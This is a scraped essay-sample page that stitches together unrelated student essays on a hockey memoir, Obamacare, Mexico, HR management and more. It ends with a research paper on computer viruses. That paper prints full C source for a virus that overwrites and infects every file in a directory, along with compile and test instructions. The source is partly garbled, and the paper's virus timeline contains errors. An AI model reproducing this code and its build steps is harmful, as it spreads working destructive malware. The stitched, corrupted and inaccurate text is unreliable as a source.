possible." The narrator even says they "Were running towards a catastrophe." All the points I have considered, all contribute towards creating a stimulating and addictive opening chapter. The main stimulant being, the need for more information. Where the narrator deliberately gives you a hint as to what may happen next, he then takes it away from you, making you want the information more - therefor he has created an addiction. The cause of it, being the first chapter, the only way to cure it, is to finish the novel!

Monday, November 11, 2019

Eleven Seconds: Autobiography of Travis Roy †Book Report Essay

Travis Roy, a former collegiate hockey player, wrote his tragic story in a book called Eleven Seconds. Well, he didn’t physically write it down himself; he dictated the story to E.M. Swift, who organized Travis’ words into the book. This is because Travis Roy is a quadriplegic. After a mere eleven seconds of Travis’ first college hockey game, his dreams of the NHL were shattered forever. Travis Roy’s autobiography, Eleven Seconds, has three parts. In the first part, Travis tells about his childhood and his high school career. He reminisces about the fun he had playing little league hockey and how he would help out at the rinks that his father managed. The next part in the story is the climax. Travis describes his feelings and emotions leading up to game-time of his first college hockey game. He is extremely excited to be playing the sport he loves at such a high level of competition, but within eleven seconds, everything is stripped away from Travis. He tries to check an opponent into the boards, but misses and hits the glass awkwardly. At this point it is all over. Travis Roy is paralyzed from the neck down: a quadriplegic. For the remainder of the story, Travis describes the motionless life that has been forced upon him. He tells about the pain of never being able to play hockey, or even live a normal life again. Travis explains the emotional battle his whole family was forced into and also states his case for stem cell research. Eleven Seconds is a very well written book in my opinion. It is easy to read and has a friendly tone. I’m happy to have read the book because it made me realized that I should appreciate the little things in life that I take for granted every day. What if I woke up one day and couldn’t move my arms or my legs? That is the way Travis Roy will wake up every day for the rest of his life. I wonder if I would be able to cope with a situation like Travis’. I don’t think I would be mentally and emotionally strong enough. The book, Eleven Seconds, made me look at life from a different perspective. I didn’t feel like I was reading about just some random guy who had an unfortunate incident, but a person that is similar to me in many ways. Travis had hopes and dreams just like I do. Therefore, I was able to relate to Travis’ burning desire to follow through with his passion and it really saddened me  to read about the way he became a quadriplegic, doi ng the very thing that he loved. I would recommend Eleven Seconds to anyone who thinks their problems are too big to handle. The book is a good reminder that we should be thankful for everything we are able to do in our lives. Any time we have a meal, take a shower, brush our teeth, or get dressed, we are doing more than Travis can do on his own. I think the story is also a great motivator to live every day to the fullest. People who like hockey would probably be interested in Travis’ story as well. Travis Roy comes off as a warm and loving person, despite his terrible injury, so his book Eleven Seconds should be easy for most anyone to read. The only hard part might be keeping one’s tears off of the pages.

Saturday, November 9, 2019

Analyzing Social Policy: Obama Care Essay

In pursuit of social and economic justice in modern, capitalist societies, it is evident that ideology has played an important role. Yet, if we are determined to make any progress in this incredibly important effort, we have to try to transcend limitations imposed by ideology and political demagogy, and establish grounds from which to carry out a rational debate on some of the most important issues in our societies. One of the crucial issues of today, as seen by Jimenez (2010) is the issue of health insurance and availability of quality health services to all the members of the society. In this area, the phenomenon of Obama Care has been one of the best examples of how ideology and politics can cause a lot of problems on the way towards establishing a just and more humane society. This essay is a fact-based analysis of the intentions behind and effect of the US health care reform of 2010, known under the name of Obama Care. The social problem that got its solution in the form of Obama Care was essentially the fact that the American health care industry, prior to the instatement of this law was in a deep crisis. Around 50 million people had no health insurance, which meant that in case they got sick they would have to cover all the costs of treatment, which can be measured in tens of thousands of dollars. Further, people with pre-existing conditions were disallowed from getting health insurance because there was a chance that the companies would not profit from them. Also, companies were able to cancel the contract with a person for almost arbitrary reasons in cases when people were in greatest need of health insurance (Obama Care Facts). All in all, the situation was catastrophic, and urgent change was needed. The Affordable Care Act, which was signed into law by Barack Obama in 2010, is essentially a piece of legislation that aimed at solving the above mentioned problems in the health industry. The target population of this policy was the working poor and the unemployed who had no way of paying for treatment in case a member of their family fell sick and needed medical help. The problem with health insurance in the US arose with the increase in unemployment and drop in the income of middle class and working class citizens, which had its consequences in the increase in the number of people who were not able to provide medical help for themselves and their families. The effects of this policy can be said to be largely positive though the situation is still far from satisfactory. In 2011, the percentage of people who had no health insurance dropped from 16. 3 to 15. 7 percent of the general population, which meant that 1. 3 million people got insured in just one year. Companies no longer have the right to cancel a contract with a client except in a case of fraud on the client’s part. Moreover, Obama Care assured the coverage of prevention treatments such as mammography and colonoscopy, which now saves millions of dollars on treatment of breast and colon cancer – the two most widespread forms of this deadly disease. Also, the premium rates are now being decreased for the majority of working Americans (Obama Care Facts). The instatement of this Act was attacked by the members of the Republican Party and rightwing commentators as socialist and against the free market. They also argued that this policy would mean a major increase in taxes. This would result in slowing down the economy and loss of jobs (Dubay 2011); however, this law actually leaves the freedom of choice and competition intact because people still have the right to choose between providers of insurance and decide what the best option. Also, there were some new taxation to cover the expenses, but it affected only the top three percent of small businesses. This will have a slight increase in taxes which is measured in fractions of a percent. In addition, it offered a tax relief for those small companies who decided to pay for their workers insurance under Obama Care (Affordable Care Act Summary). The impact of this piece of legislation on the Federal budget and citizens’ income is also expected to be positive. For example, Obama Care decreases the government spending by 716 billions of dollars by adjusting the policies under Medicare and Medicaid. Furthermore, families whose income is below the national average will see a decrease of 60 per cent in their health care insurance premiums. Finally, there is going to be a boost in health care industry with new job openings and the increase in revenue which is already around 70 percent at some clinics (Obama Care Facts). Although it is a major improvement in the struggle for social justice, this policy is far from being a perfect solution. There are still somewhere around 48 million American citizens who have not been covered by this policy (Obama Care Facts), and although the plans are to slowly include them as well, it is a striking fact that such a large number of people in the richest country in the world can live without health insurance. One need not look very far in order to see that a system that provides universal health care is possible, because Canada, the closest neighbor of the US, has that kind of system, and most of the European countries have it as well, even those that do not belong to the most developed countries. The amount of controversy that this policy caused is a sign of just how great an obstacle ideological and political misrepresentations and falsifications of reality can be, in the struggle for a more just and humane society that treats its citizens with dignity. In that light, Obama Care is certainly a great step forward.

Thursday, November 7, 2019

Frozen Revolution essays

Mexican Miracle/Frozen Revolution essays Mexico: Frozen Revolution/Mexican Miracle Mexico, the United States neighbor directly to the south is a country of many contradictions. It is typically looked at as poor or third-worldly by many, yet it is has one of the most advanced public telecommunications network in the world. Its capital Mexico City is as cosmopolitan and modern as any city in the world yet its a megalopolis infested with poverty in almost every corner. These contradictions, however, are what have plagued Mexico for many years. The Mexican revolution in the early part of the 20th Century which called for political, social, and agrarian reform, lead mainly by revolutionary leaders by the likes of Carranza, Obregn, Zapata and Villa have accomplished many of its goals but at the same time oppressed the very people that was supposed to benefit from it. From 1940 to 1970 a class of tremendously wealthy industrialists emerged to accumulate vast fortunes as the Mexican economy expanded in size and complexity. On the contrary however, this rapid ec onomic expansion was also accompanied by one of the most unequal patterns of income distribution in the world. This inequality can be looked at as a problem that the Mexican Revolution has failed to solve. The revolution produced major changes in Mexico. The old political elite had been largely swept away, to be replaced by a new ruling coalition. The creation and evolution of an official party solved the recurring crisis over presidential succession. The revolution also launched labor and social reforms that have had a lasting effect on Mexican society. Workers and peasant farmers were given a greater voice in public affairs, although they were forced to operate within the limits set by the official party and the government (Hellman, Mexico in Crisis, p.20). A new constitution gave workers the right to organize and to strike, and established a minimum wage, an eight-hour wor...

Monday, November 4, 2019

International Human Resource Management Essay Example | Topics and Well Written Essays - 3000 words - 1

International Human Resource Management - Essay Example The HRM policies therefore ran into several bottlenecks caused by these prevailing differences which resulted in a review of some of the policies. Since there was still a need to maintain some kind of general standard of HRM policies that applied across the board, the idea of International HRM came up. This need was further enhanced by the process of globalization which enabled organizations to do business all over the globe, including in places they could not dream of reaching before (Beardwell & Claydon 13). This paper explores the extent to which standardization of HRM policies has taken place across the globe. This will be done by examining the contribution of globalization to HRM policy standardization, the comparison of two different regions of the globe to gauge the extent of this globalization and a projection into the future of HRM practices. Globalization and Standardization of Human Resource Management The management of employees at all levels in a multinational company or conglomerate is referred to as strategic human resource management [SHRM] (K’Obonyo & Dimba 3). ... America is a liberal society that is fully focused on such things as human rights, open market policies, equal opportunities and gender equity among other things. The environment in Saudi Arabia is more religion oriented with a massive influence of Islam on day to day life. Issues such as equal opportunity and equity are just emerging but are not as important as the Islamic influence (K’Obonyo & Dimba 3). Consequently, successful human resource management policies in America may not work so successfully in Saudi Arabia. Emphasis on gender equity in the latter may raise more friction than it would in the former since certain roles are regarded as male roles that women cannot successfully handle. Attitudes are changing very slowly on the role of women as CEOs for example (Delery & Doty 802). SHRM therefore comes in to take into account such disparities in culture so as to enable effective and successful policy frameworks for human resources in diametrically different cultural en vironments. Policies are shaped according to the cultural environment rather that against them. In any case it is not the aim of businesses to change the prevailing political environment but to adapt as much as possible for the smooth running of the business and maximal output in terms of profitability (Delery & Doty 803). SHRM takes into account Cultural Value Dimensions. This term is used to refer to the empirical criteria used to determine the extent to which national cultures differ. There are four such dimensions: power distance paradigms, uncertainty avoidance mechanisms, individualism-collectivism factors and masculity-feminity issues (Hofstede 42). Power distance is the terminology for the extent to which the lower cadre

Saturday, November 2, 2019

Annotated Bibliography for Utilitarianism in the health care system Essay

Annotated Bibliography for Utilitarianism in the health care system - Essay Example The book further illustrates that utilitarianism leads to maximization of the common goods. In this case, the author uses the word â€Å"good† referring to optimal achievement that all members of the society tend to receive in matters related to health. This situation emerges because of various political interests and agendas in the health care system. Moreover, the book further discusses that the utilitarian perspective does not support the desired good in the healthcare system. This means that the utilitarianism does not support access to affordable and essential health care services. This is because utilitarian perspective tends to concentrate much on the policy priorities. Another significant issue discussed in the book is the fact that the concept utilitarianism is far behind access to recommendable healthcare services. This is because individuals tend to put their personal priorities ahead of health issues. This book tends to be of significant important in relation to the issues associated with utilitarianism especially in the health sector. The book will be of significant help in my research work because it supports the fact utilitarianism is not of any importance in the health sector. Utilitarianism only indicates negative outcomes especially in relation to health

Thursday, October 31, 2019

Oil on the Airline Industry Research Paper Example | Topics and Well Written Essays - 1000 words

Oil on the Airline Industry - Research Paper Example re – high demand and low supply leading to projections of increased fuel prices in the future, dependence on OPEC countries for fuel leading to change in political equations in the future, need for the airlines industry to look for better utilization of its resources to counter increasing oil prices and also invest in alternative green fuel. Fuel costs have become largest single cost component of the global airline industry reaching at 29% of the total operating costs in the year 2007 and 34% in 2008 as compared to 13% in 2001 as per IATA calculations (Conrady). This cost further increases to 50% for budget carriers (wikinvest.com). These calculations by IATA are based on crude price of $73/b. With increase in this price, the percentage will increase even further. The future projections of fuel consumption and hence the prices are even more disheartening if we look at the figures projected by Energy Information and Administration (EIA). They have projected the world’s petroleum products consumption to increase from 84mb/d in 2005 to 113mb/d in 2030 with even more consumption in developing economies of Asia and Middle East (Conrady). With the increase in demand for fuel there is a further threat from peaking out of oil reserves in Non-OPEC regions. 70% of the remaining reserves are hence located in OPEC countries. These countries are economically disturbed and also depend on their oil reserves for their economic growth as this sector represents a major part of their earnings. Because of this dependence on oil their predictions regarding their oil reserves is not very reliable as they will always give out biased information so as not to harm their financial and political prospects (Conrady). It has been estimated that the airline industry contributes around 2% of the greenhouse gases and 11% of the total green house gases emitted by U.S. also (Stuijt). The industry has too much dependence on fossil fuels. This is the greatest threat to this sector. The

Tuesday, October 29, 2019

QUIZ-1 Organized Crime Essay Example | Topics and Well Written Essays - 250 words - 1

QUIZ-1 Organized Crime - Essay Example Political beliefs do not act as a motivator to organized crime as opposed terrorism which is more of political. (McLean, J. D. 2007) In any organized crime there is always a fixer whose role is to develop contacts with the justice system and politicians and the appropriate time emerges corruption is carried out. Merton used pathological materialism to describe an American preoccupation with economic success. This later translates into focus on the goal of success rather the means by which success is achieved. The unscrupulous Robber Barons that exemplify the spirit Merton refers to as innovation. They do not care about legitimacy and in the end they emerge successful. The term culture refers to the source of patterning in human conduct. Culture plays a key role in understanding the behavior of offenders involved in organized crime Anomie is a condition that was made popular by a French sociologist Emile Durkheim in the early twentieth century. Anomie refers to a condition whereby the society does minimal effort to educate people and give them moral guidance. According to Edwin Sutherland behavior is learnt, whether it is lawful or criminal all behavior is learned. (McLean, J. D.

Sunday, October 27, 2019

Background Of Studies On Computer Viruses

Background Of Studies On Computer Viruses A computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer. As stated above, the term computer virus is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer systems data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves. Section 1.2 Background of Studies on Various Computer Viruses Boot Sector Viruses This type of viruses has ability to hide in boot sector. The viruses will load into memory when there is booting system and trying to read from hard disk. Boot sector viruses are more spread since old time when floppy disk was popular. But now we hardly seen them since many of them only can spread through floppy disk. This type of virus affects the boot sector of a floppy or hard disk. This is a crucial part of a disk, in which information on the disk itself is stored together with a program that makes it possible to boot (start) the computer from the disk. The best way of avoiding boot viruses is to ensure that floppy disks are write-protected and never start your computer with an unknown floppy disk in the disk drive. Examples of boot viruses include: Polyboot.B, AntiEXE. Companion Viruses Companion Viruses is another kind of viruses. When user computer infect by this sort of viruses, it will create another type file from an existing file in same directory (such as creating file.com from file.exe in the same folder), some companion viruses create file.exe from any folder. It can be considered file infector viruses like resident or direct action types. They are known as companion viruses because once they get into the system they accompany the other files that already exist. In other words, in order to carry out their infection routines, companion viruses can wait in memory until a program is run (resident viruses) or act immediately by making copies of themselves (direct action viruses). Some examples include: Stator, Asimov.1539, and Terrax.1069 Encrypted Viruses This type of viruses consists of encrypted malicious code, decrypted module. The viruses use encrypted code technique which make antivirus software hardly to detect them. The antivirus program usually can detect this type of viruses when they try spread by decrypted themselves. Logic Bomb Viruses Logic Bomb Viruses or sometime know as Time Bomb is small piece of malicious code or program which have ability to insert itself to other programs or system and perform specific action when the conditions are met (most Logic Bomb developers use date as conditions). The Logic Bomb does nothing until pre-programmed date is reached. Logic Bomb can perform any malicious things based on pre-programmed within it such as deleting file or displaying unwanted message or lock program and so on. They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs. Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive. Macro Viruses When talking about Macro Viruses, we refer to viruses which infect macro of other applications such as Microsoft Word, Microsoft Excel. The viruses are written in a macro language and use it to distribute themselves. Macro viruses will run automatically when user open document. Usually this type of virus cause harmless to your computer, but instead they are annoying by automatically inserting undesired texts or symbols. Example of Macro Virus: WM.Concept, it was introduced in 1995 the first macro virus that spread through Microsoft Word. And another popular one is Melissa that is first found in 1999, it also can spread through MS Word, Excel and Outlook. Multipartite Viruses Multipartite Viruses is type of viruses which infect user computer on both part boot sector and executable files and programs at the same time, with this condition, the viruses spread faster than boot sector or file infector alone. It changes the paths that indicate the location of a file. By executing a program (file with the extension .EXE or .COM) which has been infected by a virus, you are unknowingly running the virus program, while the original file and program have been previously moved by the virus. Once infected it becomes impossible to locate the original files Example: Ghost ball, the first multipartite virus. Nonresident Viruses This type of viruses is similar to Resident Viruses by using replication of module. Besides that, Nonresident Viruses role as finder module which can infect to files when it found one (it will select one or more files to infect each time the module is executed). Polymorphic Viruses: Polymorphic Virus is similar to encrypted viruses; it can infect files with an encrypted copy of itself. The viruses use difference technique to replicate themselves. Some polymorphic viruses are hardly to detect by antivirus software using virus signature based, because it do not remain any identical after replication. Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) every time they infect a system. This makes it impossible for anti-viruses to find them using string or signature searches (because they are different in each encryption) and also enables them to create a large number of copies of themselves. Examples include: Elkern, Marburg, Satan Bug, and Tuareg. Resident Viruses Resident Viruses or known as Memory Resident Viruses is malicious module. The viruses can replicate module and installing malicious code into computer memory (RAM). The viruses are commonly classified into two main categories: Fast Infectors and Slow Infectors. This type of virus is a permanent which dwells in the RAM memory. From there it can overcome and interrupt all of the operations executed by the system: corrupting files and programs that are opened, closed, copied, renamed etc. Examples include: Randex, CMJ, Meve, and MrKlunky. Stealth Viruses / Worm Stealth Viruses is some sort of viruses which try to trick anti-virus software by intercepting its requests to the operating system. It has ability to hide itself from some antivirus software programs. Therefore, some antivirus program cannot detect them. A worm is a program very similar to a virus; it has the ability to self-replicate, and can lead to negative effects on your system and most importantly they are detected and eliminated by antivirus. Examples of worms include: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, and Mapson. Section 1.3.1 Research Question 1. How did the diff. types of computer Viruses Created when, where, by whom? 2. How are they attack/work on the end user computers? 3. How we protect ourself from such type of computer viruses? 4. What will be the future trend of computer viruses? Section 1.3.2 Research Aim The research aims at understanding how Computer viruses is evolving and attacking on day to day computer business Section 1.3.3 Research Objective The objective of this research is to help to the User of Computer to make decisions on the how to solved the problem created because of computer viruses from a long time perspectives.Also to develop contrasting measure between the creator of computer viruses and the end user of the computer. Section 1.3.4 Research Hypothesis Many of the viruses that have had the greatest impact have been intended to be totally benign. Unfortunately, small errors in program code have led to disastrous results. The most frequent such error is when a virus program, which was intended to infect a computer only once, doesnt realize it has already done its job, and keeps infecting the computer over and over. This was the problem with the infamous virus released at Cornell University on November 2, 1988, by Robert Morris, Jr., which rapidly brought the entire Internet system of computers to its knees. Where the small drain of a single virus can pass unnoticed by a computer system, millions of viruses can fill every bit of memory and use up every cycle of computing power of the computer they have invaded. The hidden message revealed by the widely publicized cases of infection by computer viruses is that existing computer systems of all sorts could be making very large errors that have never been recognized. This means the computer systems that take care of every aspect of the worlds financial life, computer systems that keep personal records on you and me, computer systems that support the military capabilities of the super-powers. Good system developers test systems thoroughly before installation, attempting to test every possible logic path. However, with a system of any reasonable level of complexity, this is an impossible task, so a major system is likely only to have been thoroughly tested for frequently occurring events. Its the infrequently occurring events, and especially the unforeseen combinations of events, that are the bane of systems developers. And those are also the areas where Poincares admonition is most likely to come into play. Chapter 2 Literature Review What is Computer virus? Term was first used by Fred Cohen in 1984. A computer virus is a small program a computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer. As stated above, the term computer virus is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer systems data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves History of Computer viruses The first academic work on the theory of computer viruses (although the term computer virus was not invented at that time) was done by John von Neumann in 1949 that held lectures at the University of Illinois about the Theory and Organization of Complicated Automata. The work of von Neumann was later published as the Theory of self-reproducing automata In his essay von Neumann postulated that a computer program could reproduce. In 1972 Veith Risak published his article Selbstreproduzierende Automaton mitt minimaler Informationsà ¼bertragung (Self-reproducing automata with minimal information exchange). The article describes a fully functional virus written in assembler language for a SIEMENS 4004/35 computer system. In 1984 Fred Cohen from the University of Southern California wrote his paper Computer Viruses Theory and Experiments It was the first paper to explicitly call a self-reproducing program a virus; a term introduced by his mentor Leonard Adelman. An article that describes useful virus functionalities was published by J. B. Gunn under the title Use of virus functions to provide a virtual APL interpreter under user control in 1984. Science Fiction The Terminal Man, a science fiction novel by Michael Crichton (1972), told (as a sideline story) of a computer with telephone modem dialing capability, which had been programmed to randomly dial phone numbers until it hit a modem that is answered by another computer. It then attempted to program the answering computer with its own program, so that the second computer would also begin dialing random numbers, in search of yet another computer to program. The program is assumed to spread exponentially through susceptible computers. The actual term virus was first used in David Gerrolds 1972 novel, When HARLIE Was One. In that novel, a sentient computer named HARLIE writes viral software to retrieve damaging personal information from other computers to blackmail the man who wants to turn him off. Virus programs History The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s. Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1977 Creeper used the ARPANET to infect DEC PDP-10 computers running the TENEX operating system. Creeper gained access via the ARPANET and copied itself to the remote system where the message, Im the creeper, catch me if you can! was displayed. The Reaper program was created to delete Creeper. A program called Elk Cloner was the first computer virus to appear in the wild that is, outside the single computer or lab where it was created. Written in 1981 by Richard Skeena, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk. This virus, created as a practical joke when Skeena was still in high school, was injected in a game on a floppy disk. On its 50th use the Elk Cloner virus would be activated, infecting the computer and displaying a short poem beginning Elk Cloner: The program with a personality. The first PC virus in the wild was a boot sector virus dubbed (c) Brain, created in 1986 by the Farooq Alvin Brothers in Lahore, Pakistan, reportedly to deter piracy of the software they had written. Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk, usually inadvertently. PCs of the era would attempt to boot first from a floppy if one had been left in the drive. Until floppy disks fell out of use, this was the most successful infection strategy and boot sector viruses were the most common in the wild for many years. Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in BBS, modem use, and software sharing. Bulletin board-driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Macro viruses have become common since the mid-1990s. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel and spread throughout Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most could also spread to Macintosh computers. Although most of these viruses did not have the ability to send infected e-mail, those viruses which did take advantage of the Microsoft Outlook COM interface. Some old versions of Microsoft Word allow macros to replicate themselves with additional blank lines. If two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a mating of the two and would likely be detected as a virus unique from the parents. A virus may also send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating. Viruses that spread using cross-site scripting were first reported in 2002, and were academically demonstrated in 2005. There have been multiple instances of the cross-site scripting viruses in the wild, exploiting websites such as MySpace and Yahoo. Time line of computer viruses: In the early years floppy disks (removable media) were in fact the in the late 80s. Ultimately of course, the internet in all its forms became the major source of infection. YEAR VIRUS NAME BY WHOM TYPE 1982 ELK CLONER RICH SKRENTA 1983 COMPUTER VIRUS FRED COHEN 1986 BRAIN PAKISTAN BOOT SECTOR 1988 ARPANET ROBBERT MORRIS ENCRYPTED 1989 AIDS TROJAN 1990 ANTI-VIRUS S/W 1991 NON-ANTI S/W SYMANTEC POLYMORPHIC 1994 HOAX 1995 WORD 1999 MELLISA DAVID L. SMITH 2000 I LOVE U FILIPINE STUDENT 2001 CODE RED WORM 2003 SLAMMER 2004 MY DOON/NOVARG 2005 COMMWARRIOR-A RUSSIA CELL PHONE 2008 CONFICKER 2009 CYNER ATTACK W32.DOZOR 2010 STUNEXT TROJAN 2011 HTTP BOT BLACK SHADES Programming language used for creating Computer Viruses: C C++ Assembler PHP JAVA SCRIPT VB SCRIPT MICRO LANGUAGE/CODE How Computer Viruses Work As youll see in the next section, the term virus was applied to this type of software very early in its history. Its an apt metaphor, because a computer virus is, in many ways, similar to the biological Viruses that attack human bodies. A biological virus isnt truly a living, independent entity; as biologists will tell you, a virus is nothing more than a fragment of DNA sheathed in a protective jacket. It reproduces by injecting its DNA into a host cell. The DNA then uses the host cells normal mechanisms to reproduce itself. A computer virus is like a biological virus in that it also isnt an independent entity; it must Piggyback on a host (another program or document) in order to propagate. How a virus infects your computer 1. Virus program is launched. 2. Virus code is loaded into PC memory. 3. Virus delivers its destructive payload. 4. Virus copies itself to other programs. How Computer Viruses Work 5 If all a virus did was copy itself to additional programs and computers, there would be little Harm done, save for having all our programs get slightly larger (thanks to the virus code). Unfortunately, most viruses not only replicate themselves, they also perform other operations-many of which are wholly destructive. A virus might, for example, delete certain files on your computer. It might overwrite the boot sector of your hard disk, making the disk inaccessible. It might write Messages on your screen, or cause your system to emit rude noises. It might also hijack your E-mail program and use the program to send it to all your friends and colleagues, thus replicating itself to a large number of PCs. Viruses that replicate themselves via e-mail or over a computer network cause the subsidiary Problem of increasing the amount of Internet and network traffic. These fast-replicating viruses Called worms can completely overload a company network, shutting down servers and forcing ten s of thousands of users offline. While no individual machines might be damaged, this type of Communications disruption can be quite costly. As you might suspect, most viruses are designed to deliver their payload when theyre first executed. However, some viruses wont attack until specifically prompted, typically on a predetermined Date or day of the week. They stay on your system, hidden from sight like a sleeper Agent in a spy novel, until theyre awoken on a specific date; then they go about the work them were programmed to do. In short, viruses are nasty little bits of computer code, designed to inflict as much damage As possible, and to spread to as many computers as possible-a particularly vicious combination. How to Create a Computer Virus? This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Heres the source code of the virus program. #include #include #include #include #include #include FILE *virus,*host; int done, a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(*.*,ffblk,0); while(!done) { virus=fopen(_argv[0],r3. Virus delivers its destructive payload. b); host=fopen(ffblk.ff_name,rb+); if(host==NULL) goto next; x=89088; printf(Infecting %sn,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); a++; next: { fcloseall(); done=findnext(ffblk); } } printf(DONE! (Total Files Infected= %d),a); end=clock(); printf(TIME TAKEN=%f SECn, (end-st)/CLK_TCK); getch(); } COMPILING METHOD: USING BORLAND TC++ 3.0 (16-BIT): 1. Load the program in the compiler, press Alt-F9 to compile 2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER) 3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR ITS SIZE) 4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT) 5. Once again follow the STEP 1 STEP 2.Now the generated EXE File is ready to infect USING BORLAND C++ 5.5 (32-BIT) : 1. Compile once, note down the generated EXE file length in bytes 2. Change the value of X in source code to this length in bytes 3. Recompile it. The new EXE file is ready to infect HOW TO TEST: 1. Open new empty folder 2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH PASTING IN THE NEW FOLDER) 3. Run the virus EXE file there you will see all the files in the current directory get infected. 4. All the infected files will be ready to re-infect. Why Viruses Exist Computer viruses, unlike biological viruses, dont spring up out of now here-theyre created. By people. And the people-programmers and developers, typically-who create computer viruses Know what theyre doing. These code writers deliberately create programs that they know will Wreak havoc on huge numbers of computer users. The question is why? It takes some degree of technical skill to create a virus. To that end, creating a computer Virus is no different than creating any other computer application. Any computer programmer or Developer with a minimal amount of skill can create a virus-all it takes is knowledge of a programming Language, such as C, Visual Basic, or Java, or a macro language, such as VBA. By using a build your own virus program-of which there are several available, Via the Internet underground. So, by definition, a virus writer is a person with a certain amount of technical expertise. But Instead of using that expertise productively, virus writers use it to generate indiscriminate mayhem among other computer users. This havoc-wreaking is, in almost all instances, deliberate. Virus writers intend to be destructive. They get some sort of kick out of causing as much damage as possible, from the relative Anonymity of their computer keyboards. Understanding Computer Viruses In addition, some developers create viruses to prove their technical prowess. Among certain Developers, writing a successful virus provides a kind of bragging right, and demonstrates, in some warped fashion, that the writer is especially skilled. Unfortunately, the one attribute that virus writers apparently lack is ethical sense. Virus programs can be enormously destructive, and it takes a peculiar lack of ethics to deliberately perpetrate such destruction on such a wide scale. In the end, a virus writer is no better than a common vandal. Except for the technical expertise required, the difference between throwing a rock through a window and destroying PC files via a virus is minimal. Some people find pleasure in destruction, and in our high-tech age, such Pleasure can come from writing destructive virus code. What You Can Do About Computer Viruses Theres very little you can do, on a personal level, to discourage those high-tech vandals who create Virus programs. There are plenty of laws already on the books that can be used to prosecute these criminals, and such criminal investigations-and prosecutions-have become more common in recent years. However, as with most criminal activity, the presence of laws doesnt always mean there are fewer criminals; the truth is, theres a new batch of virus writers coming online every day. All of which means that you cant rely on anyone else to protect you from these virus-writing Criminals. Ultimately, you have to protect yourself. Reducing Your Chances of Infection To make yourself less of a target for virus infection, take the following steps: Restrict your file downloading to known or secure sources. The surest way to catch a virus is to download an unknown file from an unknown site; try not to put you at risk like this unless you absolutely have to. Dont open any e-mail attachments you werent expecting. The majority of viruses today arrive in your mailbox as attachments to e-mail messages; resist the temptation to open or view every file attachment you receive. Use an up-to-date anti-virus program or service. Antivirus programs work; they scan the files on your computer (as well as new files you download and e-mail messages you receive) and check for any previously identified viruses. Theyre a good first line of defence, As long as you keep the programs up-to-date with information about the very latest viruses and most antivirus programs make it easy to download updates. Enable macro virus protection in all your applications. Most current Microsoft Applications include special features that keep the program from running unknown macros and thus prevent your system from being infected by macro viruses. Create backup copies of all your important data. If worse comes to worst and your Entire system is infected; you may need to revert to no infected versions of your most critical Files. You cant do this unless you plan ahead and back up your important data. Preventing Viruses Attacks. Diagnosing a Virus Infection How do you know if your computer has been infected with a virus? In short, if it starts acting Funny-doing anything it didnt do before-then a probable cause is some sort of computer Virus. Here are some symptoms to watch for: à ¢Ã¢â€š ¬Ã‚ ¢ Programs quit working or freeze up. à ¢Ã¢â€š 